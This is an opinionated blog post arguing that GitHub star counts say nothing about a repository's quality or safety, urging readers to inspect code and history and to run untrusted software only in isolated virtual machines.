For fuck’s sake, STOP with the Github stars madness.
Everywhere, everyday, everyone, YouTube, blogs, news outlets, … it has become the only metric to assess if a repository is interesting, important, useful, inspiring, or whatever.
This repo got
meaningless numberstars in 2 days, it’s genius!
This repo has now
meaningless numberof stars, you MUST use it!
What is wrong with you all?
All these years of fake online reviews have not taught you anything?
Since when the popularity of anything told you anything about how good that thing actually was?
By the way, did you look at the number of stars of barely known repositories like:
- Firefox [https://github.com/mozilla-firefox/firefox]
- VLC [https://github.com/videolan/vlc]
- Notepad++ [https://github.com/notepad-plus-plus/notepad-plus-plus]
- Wazuh [https://github.com/wazuh/wazuh]
The number of stars does not tell you anything useful.
You don’t know if:
- it is used at all
- it is useful
- it is qualitatively good
- it is safe
Don’t you all remember Iceland went out of cucumbers because of a Tiktok video? Or the global shortage of pistachios thanks to the Dubai chocolate?
Learn to make your own mind about things. Read the README file. Look at the issues tab. Look at the pull requests tab. Look at the commit history. Look at the insights. Look at the code base.
Are you really going to run a 2-day old software vibe-coded by a random anonymous bloke? At work? At home on your computer that holds your private data?
Think about the consequences.
Internet is filled with people who want your money, whatever the means. It’s already risky because we all depend on foundational, global software like xz, Debian Linux, trivy, etc. It’s already bad when they get compromise but you are giving the keys to your home to bad people. Willingly.
If you want to run untrusted software, do it responsibly. Run it in a virtual machine, in a network isolated from your home network(s). Have an EDR like Wazuh in the virtual machine. Check your logs for unusual and malicious patterns.
You want to help open-source software? Use it, more than five minutes for a Youtube video. Compare it to existing similar software, write a review about it, contact the author(s) to let them know about your findings. Report bugs in a useful manner. Better, fix the damn bugs. Use your 200-dollar a month subscription to do some useful work. Review the fix, test it yourself, make sure it is actually working. If it is working, only then submit a pull request.
Finally, if the software has actually brought anything positive, only then, perhaps click that star button. But that will only trigger useless statistics-processes and provide zero useful feedback to anyone.
Random sources over the years:
- [https://www.wired.com/story/fake-amazon-reviews-underground-market/]
- [https://www.nytimes.com/wirecutter/blog/lets-talk-about-amazon-reviews/]
- [https://www.legavox.fr/blog/maitre-anthony-bem/reputation-rapport-dgccrf-faux-avis-15824.htm]
- [https://daily.dev/blog/xz-backdoor-the-full-story-in-one-place/]
- [https://unit42.paloaltonetworks.com/axios-supply-chain-attack/]